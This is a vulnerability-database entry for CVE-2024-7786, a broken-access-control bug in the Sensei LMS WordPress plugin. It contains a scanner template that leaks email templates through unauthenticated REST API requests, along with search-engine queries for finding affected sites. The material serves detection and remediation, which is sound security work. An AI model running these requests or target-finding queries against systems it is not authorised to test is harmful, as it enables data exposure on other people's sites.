| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2024-7786 | 4 Sep 202409:22 | – | circl | |
| WordPress plugin Sensei LMS 安全漏洞 | 4 Sep 202400:00 | – | cnnvd | |
| CVE-2024-7786 | 4 Sep 202406:00 | – | cve | |
| CVE-2024-7786 Sensei LMS < 4.24.2 - Unauthenticated Email Template Leak | 4 Sep 202406:00 | – | cvelist | |
| CVE-2024-7786 | 4 Sep 202406:15 | – | nvd | |
| WordPress Sensei LMS Plugin < 4.24.2 is vulnerable to Broken Access Control | 4 Sep 202400:00 | – | patchstack | |
| WordPress Sensei LMS plugin < 4.24.2 - Unauthenticated Email Template Leak vulnerability | 4 Sep 202409:35 | – | patchstack | |
| PT-2024-38580 · WordPress · Sensei Lms | 3 Sep 202400:00 | – | ptsecurity | |
| CVE-2024-7786 | 23 May 202509:49 | – | redhatcve | |
| VulnCheck KEV: CVE-2024-7786 | 4 Sep 202400:00 | – | vulncheck_kev |
id: CVE-2024-7786
info:
name: Sensei LMS < 4.24.2 - Email Template Leak
author: s4e-io
severity: high
description: |
The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates.
impact: |
Unauthenticated attackers can access and leak email templates through unprotected REST API endpoints, potentially exposing sensitive information included in email communications and template configurations.
remediation: |
Update Sensei LMS plugin to version 4.24.2 or later to address the REST API protection issue.
reference:
- https://wpscan.com/vulnerability/f44e6f8f-3ef2-45c9-ae9c-9403305a548a/
- https://nvd.nist.gov/vuln/detail/CVE-2024-7786
- https://www.usom.gov.tr/bildirim/tr-24-1387
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-7786
epss-score: 0.01635
epss-percentile: 0.73332
metadata:
max-request: 2
verified: true
vendor: automattic
product: sensei-lms
framework: wordpress
publicwww-query: "/wp-content/plugins/sensei-lms"
fofa-query: body="/wp-content/plugins/sensei-lms"
tags: cve,cve2024,wpscan,wp,wp-plugin,wordpress,sensei-lms,exposure,vkev,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"id","date_gmt","slug")'
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: json
part: body
name: template_id
json:
- '.[0].id'
internal: true
- raw:
- |
GET /index.php/wp-json/wp/v2/sensei_email/{{template_id}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'sensei_email_preview_id={{template_id}}'
- 'media?parent={{template_id}}'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a00473045022100d2e8eadd84c543044a13d17056f84d7939da106e1dbba3588201d0fe508e091302200d2a256504baee74c05d54fd6614b38216943e736cd83715c3206f8c214385ea:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation